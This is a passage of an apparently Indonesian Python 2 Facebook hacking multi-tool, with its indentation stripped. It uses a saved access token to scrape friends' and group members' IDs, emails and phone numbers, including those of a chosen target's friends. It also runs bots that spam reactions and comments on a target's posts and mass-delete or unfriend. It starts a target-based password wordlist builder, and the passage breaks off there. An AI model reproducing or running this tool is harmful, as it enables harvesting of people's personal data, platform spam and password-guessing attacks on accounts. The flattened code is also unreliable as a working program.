for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
